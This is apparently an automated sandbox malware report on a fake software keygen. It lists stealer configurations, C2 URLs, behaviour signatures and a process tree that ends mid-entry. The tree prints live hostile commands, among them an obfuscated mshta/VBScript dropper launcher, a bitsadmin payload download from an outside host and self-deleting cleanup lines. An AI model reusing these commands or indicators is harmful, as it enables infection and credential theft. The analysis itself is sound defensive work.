Analysis

  • max time kernel
    1800s
  • max time network
    1772s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 19:22

General

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected facebook phishing page
  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 55 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1836
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2716
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2700
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://keygenit.com/d/9472d2406f110qn26n09.html
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:604
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" https://keygenit.com/d/9472d2406f110qn26n09.html
          2⤵
          • Checks processor information in registry
          • NTFS ADS
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4024
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4024.0.755863223\1853972545" -parentBuildID 20200403170909 -prefsHandle 1512 -prefMapHandle 1484 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4024 "\\.\pipe\gecko-crash-server-pipe.4024" 1600 gpu
            3⤵
              PID:1176
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4024.3.1499710865\38484470" -childID 1 -isForBrowser -prefsHandle 2016 -prefMapHandle 2012 -prefsLen 122 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4024 "\\.\pipe\gecko-crash-server-pipe.4024" 2236 tab
              3⤵
                PID:2212
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4024.13.2005543433\559171054" -childID 2 -isForBrowser -prefsHandle 3364 -prefMapHandle 3360 -prefsLen 6979 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4024 "\\.\pipe\gecko-crash-server-pipe.4024" 3348 tab
                3⤵
                  PID:4008
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4024.20.26527394\1324787541" -childID 3 -isForBrowser -prefsHandle 4624 -prefMapHandle 4208 -prefsLen 7907 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4024 "\\.\pipe\gecko-crash-server-pipe.4024" 4760 tab
                  3⤵
                    PID:4352
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2604
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2388
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2368
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                      1⤵
                        PID:1380
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                        1⤵
                          PID:1296
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                          1⤵
                            PID:1228
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1092
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                              1⤵
                              • Drops file in System32 directory
                              PID:1044
                              • C:\Users\Admin\AppData\Roaming\bervgdc
                                C:\Users\Admin\AppData\Roaming\bervgdc
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:4128
                                • C:\Users\Admin\AppData\Roaming\bervgdc
                                  C:\Users\Admin\AppData\Roaming\bervgdc
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  PID:7040
                              • C:\Users\Admin\AppData\Roaming\drrvgdc
                                C:\Users\Admin\AppData\Roaming\drrvgdc
                                2⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                PID:4560
                              • C:\Users\Admin\AppData\Roaming\bervgdc
                                C:\Users\Admin\AppData\Roaming\bervgdc
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:6052
                                • C:\Users\Admin\AppData\Roaming\bervgdc
                                  C:\Users\Admin\AppData\Roaming\bervgdc
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  PID:1600
                              • C:\Users\Admin\AppData\Roaming\drrvgdc
                                C:\Users\Admin\AppData\Roaming\drrvgdc
                                2⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                PID:5352
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                              1⤵
                                PID:60
                              • \??\c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                1⤵
                                • Suspicious use of SetThreadContext
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1016
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                  2⤵
                                  • Drops file in System32 directory
                                  • Checks processor information in registry
                                  • Modifies data under HKEY_USERS
                                  PID:1028
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:4828
                                • C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_serial_keys_gen_by_FFF.zip\Trepcad_6_6_00_serial_keys_gen_by_FFF.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_serial_keys_gen_by_FFF.zip\Trepcad_6_6_00_serial_keys_gen_by_FFF.exe"
                                  1⤵
                                    PID:4208
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                      2⤵
                                        PID:1872
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                          keygen-pr.exe -p83fsase3Ge
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4296
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4656
                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                              5⤵
                                              • Executes dropped EXE
                                              PID:4944
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                          keygen-step-1.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4332
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                          keygen-step-5.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4364
                                          • C:\Windows\SysWOW64\mshta.exe
                                            "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                            4⤵
                                              PID:4452
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "" == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                                5⤵
                                                  PID:4932
                                                  • C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe
                                                    MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:1664
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF ""/pkpxuxwmNl2s_EnQNC5XPVi2 "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                                      7⤵
                                                        PID:4996
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "/pkpxuxwmNl2s_EnQNC5XPVi2 " == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                                          8⤵
                                                          • Loads dropped DLL
                                                          • Modifies registry class
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5092
                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                        "C:\Windows\System32\regsvr32.exe" /U -S .\5VOMHR.c
                                                        7⤵
                                                        • Loads dropped DLL
                                                        • Suspicious use of NtCreateThreadExHideFromDebugger
                                                        PID:4188
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F -iM "keygen-step-5.exe"
                                                      6⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1260
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                keygen-step-2.exe
                                                3⤵
                                                • Executes dropped EXE
                                                • Modifies system certificate store
                                                PID:3492
                                                • C:\Users\Admin\AppData\Roaming\848D.tmp.exe
                                                  "C:\Users\Admin\AppData\Roaming\848D.tmp.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:5016
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\848D.tmp.exe"
                                                    5⤵
                                                      PID:2280
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /T 10 /NOBREAK
                                                        6⤵
                                                        • Delays execution with timeout.exe
                                                        PID:2332
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                    4⤵
                                                    • Blocklisted process makes network request
                                                    • Executes dropped EXE
                                                    PID:1896
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 127.0.0.1
                                                      5⤵
                                                      • Runs ping.exe
                                                      PID:4540
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                  keygen-step-3.exe
                                                  3⤵
                                                    PID:1896
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                      4⤵
                                                        PID:3472
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 1.1.1.1 -n 1 -w 3000
                                                          5⤵
                                                          • Runs ping.exe
                                                          PID:4704
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                      keygen-step-4.exe
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:1748
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe"
                                                        4⤵
                                                          PID:5016
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                            5⤵
                                                              PID:5092
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4980
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:820
                                                            • C:\Users\Admin\AppData\Local\Temp\is-7N3D2.tmp\Install.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-7N3D2.tmp\Install.tmp" /SL5="$30290,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              PID:5048
                                                              • C:\Users\Admin\AppData\Local\Temp\is-FF872.tmp\Ultra.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-FF872.tmp\Ultra.exe" /S /UID=burnerch1
                                                                6⤵
                                                                • Drops file in Drivers directory
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                • Drops file in Program Files directory
                                                                PID:512
                                                                • C:\Program Files\MSBuild\ZRBQWTJEZE\ultramediaburner.exe
                                                                  "C:\Program Files\MSBuild\ZRBQWTJEZE\ultramediaburner.exe" /VERYSILENT
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:1468
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-IV9PM.tmp\ultramediaburner.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-IV9PM.tmp\ultramediaburner.tmp" /SL5="$203A0,281924,62464,C:\Program Files\MSBuild\ZRBQWTJEZE\ultramediaburner.exe" /VERYSILENT
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:3472
                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      PID:4124
                                                                • C:\Users\Admin\AppData\Local\Temp\b5-bb30a-3d8-26cbc-8677523f597d1\Jicilylojae.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\b5-bb30a-3d8-26cbc-8677523f597d1\Jicilylojae.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Checks computer location settings
                                                                  PID:3744
                                                                • C:\Users\Admin\AppData\Local\Temp\1e-7f929-af5-589b9-6b7bfabae4da2\Paejaepelota.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1e-7f929-af5-589b9-6b7bfabae4da2\Paejaepelota.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5036
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lnz5bfcj.lpg\instEU.exe & exit
                                                                    8⤵
                                                                      PID:1408
                                                                      • C:\Users\Admin\AppData\Local\Temp\lnz5bfcj.lpg\instEU.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\lnz5bfcj.lpg\instEU.exe
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        PID:5228
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5qditogb.llg\md1_1eaf.exe & exit
                                                                      8⤵
                                                                        PID:5844
                                                                        • C:\Users\Admin\AppData\Local\Temp\5qditogb.llg\md1_1eaf.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\5qditogb.llg\md1_1eaf.exe
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          PID:6024
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qtrdbfhv.urt\google-game.exe & exit
                                                                        8⤵
                                                                          PID:5636
                                                                          • C:\Users\Admin\AppData\Local\Temp\qtrdbfhv.urt\google-game.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\qtrdbfhv.urt\google-game.exe
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:5192
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                              10⤵
                                                                              • Loads dropped DLL
                                                                              PID:6132
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e4yjbj1e.knw\y1.exe & exit
                                                                          8⤵
                                                                            PID:4692
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              9⤵
                                                                                PID:1408
                                                                              • C:\Users\Admin\AppData\Local\Temp\e4yjbj1e.knw\y1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\e4yjbj1e.knw\y1.exe
                                                                                9⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:5752
                                                                                • C:\Users\Admin\AppData\Local\Temp\ePuC7sqj3z.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\ePuC7sqj3z.exe"
                                                                                  10⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies system certificate store
                                                                                  PID:5704
                                                                                  • C:\Users\Admin\AppData\Roaming\1619212944342.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\1619212944342.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619212944342.txt"
                                                                                    11⤵
                                                                                      PID:2804
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\ePuC7sqj3z.exe"
                                                                                      11⤵
                                                                                        PID:5236
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 127.0.0.1 -n 3
                                                                                          12⤵
                                                                                          • Runs ping.exe
                                                                                          PID:5784
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jszrckiz.sqa\inst.exe & exit
                                                                                  8⤵
                                                                                    PID:5944
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jszrckiz.sqa\inst.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jszrckiz.sqa\inst.exe
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5972
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4p4foav.s40\SunLabsPlayer.exe /S & exit
                                                                                    8⤵
                                                                                      PID:5500
                                                                                      • C:\Users\Admin\AppData\Local\Temp\k4p4foav.s40\SunLabsPlayer.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\k4p4foav.s40\SunLabsPlayer.exe /S
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Drops file in Program Files directory
                                                                                        PID:2680
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                          10⤵
                                                                                            PID:5808
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                            10⤵
                                                                                              PID:5244
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                              10⤵
                                                                                                PID:2900
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  11⤵
                                                                                                    PID:5656
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                  10⤵
                                                                                                    PID:4580
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                    10⤵
                                                                                                      PID:4796
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                      10⤵
                                                                                                        PID:4764
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                        10⤵
                                                                                                        • Checks for any installed AV software in registry
                                                                                                        PID:5516
                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                        10⤵
                                                                                                        • Download via BitsAdmin
                                                                                                        PID:5216
                                                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                        10⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:6496
                                                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pjlLAVBBbnyzh2Zt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                        10⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6512
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                        10⤵
                                                                                                          PID:5760
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                          10⤵
                                                                                                            PID:6628
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                            10⤵
                                                                                                              PID:6796
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                              10⤵
                                                                                                                PID:2964
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                                10⤵
                                                                                                                  PID:692
                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                                                  10⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:2400
                                                                                                                  • C:\Windows\system32\rundll32.exe
